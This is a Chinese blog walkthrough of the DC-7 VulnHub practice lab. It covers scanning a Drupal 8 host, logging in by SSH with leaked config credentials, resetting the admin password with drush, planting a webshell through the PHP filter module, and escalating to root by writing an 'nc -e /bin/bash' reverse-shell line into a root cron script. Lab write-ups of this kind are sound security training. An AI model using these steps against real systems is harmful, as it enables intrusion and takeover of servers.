DC7靶场渗透流程(超详细)

最新推荐文章于 2024-08-14 15:00:00 发布
最新推荐文章于 2024-08-14 15:00:00 发布
阅读量312 收藏
点赞数
分类专栏: DC靶场系列 文章标签: web安全 网络安全 安全 linux 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64583632/article/details/130080712
版权

靶机页面

 

信息收集

获取DC7的IP地址

通过查看到DC7的MAC地址为00:0C:29:04:46:86,然后用arp-scan扫描我本机网段内存活的主机,发现DC7的MAC地址对应的IP为192.168.175.160

靶机的web页面

 

扫描DC7开启的端口

┌──(kali💋kali)-[~]
└─$ sudo nmap -Pn -A -p- -sS -sC -T4 192.168.175.160
[sudo] password for kali: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-10 10:42 EDT
Nmap scan report for 192.168.175.160
Host is up (0.00083s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
MAC Address: 00:0C:29:04:46:86 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
​
TRACEROUTE
HOP RTT     ADDRESS
1   0.83 ms 192.168.175.160
​
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.56 seconds
端口状态服务版本
22opensshOpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80openhttpApache httpd 2.4.25 ((Debian))

web应用指纹信息

OSLinux 3.X
ServiceApache/2.4.25 (Debian)
X-Powered-ByPHP
CMSDrupal 8

droopescan扫描报告

┌──(kali💋kali)-[~/tools/droopescan]
└─$ ./droopescan scan drupal -u http://192.168.175.160                            
[+] No plugins found.                                                           
​
[+] Themes found:
    startupgrowth_lite http://192.168.175.160/themes/startupgrowth_lite/
        http://192.168.175.160/themes/startupgrowth_lite/LICENSE.txt
​
[+] Possible version(s):
    8.7.0
    8.7.0-alpha1
    8.7.0-alpha2
    8.7.0-beta1
    8.7.0-beta2
    8.7.0-rc1
    8.7.1
    8.7.10
    8.7.11
    8.7.12
    8.7.13
    8.7.14
    8.7.2
    8.7.3
    8.7.4
    8.7.5
    8.7.6
    8.7.7
    8.7.8
    8.7.9
​
[+] Possible interesting urls found:
    Default admin - http://192.168.175.160/user/login
​
[+] Scan finished (0:07:41.838978 elapsed)

渗透流程

SSH账户名密码获取

提示不要进行无用的爆破,跳出框框,然后看了左下角有个@DC7USER很新奇,之前的Drupal没有这个,然后去必应搜索,发现有文件则继续深入

 

发现有config.php,敏感文件,点进去看看发现数据库账户名dc7user和密码MdR3xOgB7#dW

但是发现好像用不着数据库,然后跑去登录后台也不行

然后试着SSH连接,发现可以

ssh dc7user@192.168.175.160

目录下有一个文件夹backups和一个文件mbox

查看mbox,发现一个计划任务

定位到opt/scripts/backups.sh

试着想把想反弹shell的命令写进去然后执行反弹,但是发现该用户对它没有写的权限,不可行

只能从其他方式入手,看看drush命令或者gpg命令

gpg命令是用来加密文件
drush是一个简化了创建和管理Drupal8网站的命令行工具

drush常用命令介绍

后台登录

查看admin的用户信息

drush user-information admin

可以使用drush命令修改密码

drush upwd admin --password="123456"

修改成功,登录后台

反弹shell

在content下Add content的basic page里面可以编辑内容,可以在里面写进webshell然后连接,但是它仅支持html格式的,不信这么大的CMS功能这么小,百度看到它可以支持php格式,但需要PHP解释器,可以在EXtend模块里面安装

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

安装成功

接下来把冰蝎的webshell写进去,冰蝎连接

 

在冰蝎里面操作,修改backups.sh文件,把反弹shell的命令写进去

nc -e /bin/bash 192.168.175.144 1444

为什么这样做呢,因为以root的身份去执行这个定时任务,正好反弹shell的话就是root权限

监听等待反弹

成功反弹

查看flag

 

tacokings
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub系列之DC7靶场详解
weixin_50053818的博客
05-30 1098
文章目录环境信息收集安装插件拿shell提权 环境 vulhub系列之DC7靶场 VMware虚拟机 kali 信息收集 由目标靶机的MAC地址得到目标IP为192.168.137.103,直接nmap扫描。 可以知道目标开放了80和22端口,直接进入网站。 进入网站发现CMS是drupal 8,在漏洞进行搜索,无果。所以只能查看网站。翻译一下首页的内容。 欢迎来到DC-7 DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。 ???? 尽管此挑战并不是技术性的全部,但如果您需要诉诸于暴力破
DC-7靶场
qq_49518993的博客
08-29 797
DC-7靶场
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念验证”部分是由于 Twitter 上提出的有关双因素身份验证和 Linux 的问题以及 @theart42 的建议而产生的。 这一挑战的最终目标是绕过双因素身份验证、获得 root 权限并读取唯一的标志。 除非您尝试通过 SSH 登录,否则您可能甚至不知道已经安装和配置了双因素身份验证,但它确实存在并且正在发挥作用。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来说,Google 可以提供很大的帮助,但您可以随时发推文@DCAU7 寻求帮助,以帮助您重新开始。但请注意:我不会给你答案,相反,我会给你一个如何继续前进的想法。
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
DC-7靶机渗透测试
来日可期的博客
08-13 1118
.gpg 后缀的文件通常是使用 GNU Privacy Guard (GPG) 或类似的加密软件创建的加密文件。GPG 是一个开源的加密工具,用于确保数据的机密性和完整性。 .gpg 文件是经过加密的文件,其中包含了原始文件的内容,但使用了加密算法对其进行了保护。这些文件经过加密后,只能通过相应的私钥或密码进行解密,以还原到原始文件。
Vulhub 靶场 DC-7解析
黑战士的博客
02-24 1002
kali的靶攻击机IP地址:192.168.200.14DC-7靶机的IP地址:暂时未知注意:靶机和攻击机应处于一个网卡下通过MAC地址判断靶机DC-7的IP 地址。
靶机DC-7
weixin_43940853的博客
12-09 304
kali : 192.168.230.233 靶机 : 192.168.230.235 扫了目录,查看了robots.txt,登陆框也看了一下注入,并没有发现啥,注意到下面的@DC7USER,google一下,发现了源码,拷贝下来 打开其中的config.php,发现了一个账号密码,ssh上去直接登录成功 先进入了一个目录,查看文件后发现都是乱码 把目标放在mbox上 关注到邮件的Subj...
DC7-靶机
Au
11-30 1662
下载地址 下面是作者的一些提示,和爆破无关,需要Google~~~ 配置的环境: kali:192.168.25.131 DC7-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.128,判定为DC7-靶机,继续使用nmap获取详细信息...
DC-7靶机
Flamingo1998的博客
07-17 140
DC-7靶机
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-7实战
05-30
vuInhub靶场实战系列-DC-7实战
vulnhub之DC7靶机
LainWith的博客
02-14 1489
目录介绍信息收集主机发现主机信息探测访问网站SSH登录信息收集修改web后台密码挂马提权 介绍 系列: DC(此系列共10台) 发布日期:2019年8月31日 难度:中级 Flag:获取root权限,并拿到唯一的flag 学习: drupal安装php实现挂马 提权 靶机地址:https://www.vulnhub.com/entry/dc-7,356/ 从靶场得到提示信息: 靶机更适用Virtualbox 不要尝试爆破,很难成功 信息收集 主机发现 netdiscover主机发现 对于VulnHu
vulnhub渗透测试靶机DC-7
weixin_46128614的博客
01-19 462
下载地址:https://www.vulnhub.com/entry/dc-7,356/ nmap -sT -sV -p- -T5 192.168.49.21 我们进到80端口,作者提示我们不是爆破和字典攻击,让我们跳出box 在左下角留了一个用户,应该是Twitter的,老外都爱用Twitter 果然 我们把github上的内容下载下来,查看到了一个配置文件给到了一个账号和密码 dc7u...
【Vulnhub靶机】DC-7
过期的秋刀鱼
08-09 527
打开中国 蚁剑连接,蚁剑要想连接就得知道,刚上传的一句话木马所在的位置。目录下看看,发现是一个登录页面,这个时候没有密码,也不知道账户名。文件,发现里面内容重复的很多,是一封邮件,有一个可执行的脚本,同样的,把靶机跟kali放在同一网段,(NAT模式)一个以root权限定期执行的备份任务,执行文件。,就需要从其他方向找突破口了。目录里,发现都是看不懂的,搜了一下。后缀格式,发现是一种加密的文件格式。的权限,发现所有人都可以执行此文件。查看都有什么文件 ,使用命令。这么个关键词,发现有一个。
DC-7(drupal)靶机
qq_56726035的博客
07-20 142
再次记录一次drupal渗透
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
08-14 1054
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
在 DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tacokings

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值